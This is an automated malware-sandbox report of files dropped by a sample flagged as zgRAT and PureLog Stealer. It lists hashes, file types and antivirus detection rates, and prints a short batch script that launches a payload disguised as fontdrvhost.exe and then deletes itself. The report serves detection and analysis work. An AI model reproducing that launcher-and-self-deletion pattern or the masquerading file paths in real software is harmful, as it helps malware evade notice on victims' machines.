                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):196608
                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):51200
                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):98304
                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):159744
                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):157
                                                                                                                  Entropy (8bit):5.107669353081284
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m3zX+DoDWCSBktKcKZG1N+E2J5xAIQQdgtgh:hCRLuVFOOr+DEDuUDGKOZG1N723fIe
                                                                                                                  MD5:BC3B29D8A0640ED02B2DA0A5FEDB5755
                                                                                                                  SHA1:3A49DAC28150D14879E95D06505ACE4DC7C3004B
                                                                                                                  SHA-256:869E7F7E16DD2809B5BA0D91030E46275A6261CCE6348FD6AB0B9F6A87682B23
                                                                                                                  SHA-512:F2AA8CCCEDEF17237A54ECC2217F2C251F6866B4CF9FE9C5B9887DA5E589C10BD3DB940A10640BAFE94F06A15CB7E02E6077F926374A002952DC4A89B28F4851
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Drivers\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\vK5Z1luEHZ.bat"
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):196608
                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9728
                                                                                                                  Entropy (8bit):5.0168086460579095
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22016
                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9728
                                                                                                                  Entropy (8bit):5.0168086460579095
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.529329139831718
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22016
                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.529329139831718
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\backgroundTaskHost.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\backgroundTaskHost.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with very long lines (332), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):332
                                                                                                                  Entropy (8bit):5.792023941284571
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:qyhQoLB/z9yVQtkHUabjIuKsrQd7W+tYUNxQMzjhwguKDPL/iSKg3SK5sKu2:JhQoL99yVGwnftK+QTNx1zju+L93rs0
                                                                                                                  MD5:43BB8FC2D4DF934A4B16C275DF01E5CD
                                                                                                                  SHA1:297C6319983A50E4FDF47EE319FDC5D160E5F8E0
                                                                                                                  SHA-256:873FE767A13D435940EDABB0739D8894CE91DCE77E6C8448A134BF398DEB24D7
                                                                                                                  SHA-512:374B73AB08BC0B0BFE690EA5180E6BBB50921B4774F2D788C5FEAE91B9C3C314C734C63E313D13896055680C260F7869BF2F7008D1FC18AE9CA4841A285607D9
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):178
                                                                                                                  Entropy (8bit):5.646136788982501
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:NUSKE7dWNQoXX2MM9jON+3s/zACqkU5+EeBSD8LOM50l69Rj114XsM/HAGgcamz9:FKeWHWV6+Os15pFtUz1OXNHA5GpORnqP
                                                                                                                  MD5:1ADE03E962C1A2719DE6DE0F65D32299
                                                                                                                  SHA1:F680F5D9EB2FD844628646C8322277B38AC9868F
                                                                                                                  SHA-256:F9AE5315A2C4B4EF130B714886CFB132EFF21E79FA3DC3AD4C5BB6CF920D0382
                                                                                                                  SHA-512:750324ADA607D0B3D751D6FA0C94D8191731E91E831F4528D169BBC46BDA0079D12CF11F36A140FB5FFFBE4162C81623273DF0FCE9295F344E056859A37ED3C8
                                                                                                                  Malicious:false
                                                                                                                  Preview:Aaq7oakq1HlM3hd0OrM22SiexdXaDnak6d91ARIZxTeJ0uOt0bsqIvRs1MJLDKnOqBPahm06jxEiyZnDOnkl5ubKLR9xH7WnqQcyeyLNlvHVqt3ciG6ZkCS6kFPQnCylbb2i6ziZbWAJmGecXgOBA6Cn7fOZi5ji7g4P0Vftig7OBJUekx
                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):502
                                                                                                                  Entropy (8bit):4.614559420844397
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:PhGI5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:pVdUOAokItULVDv
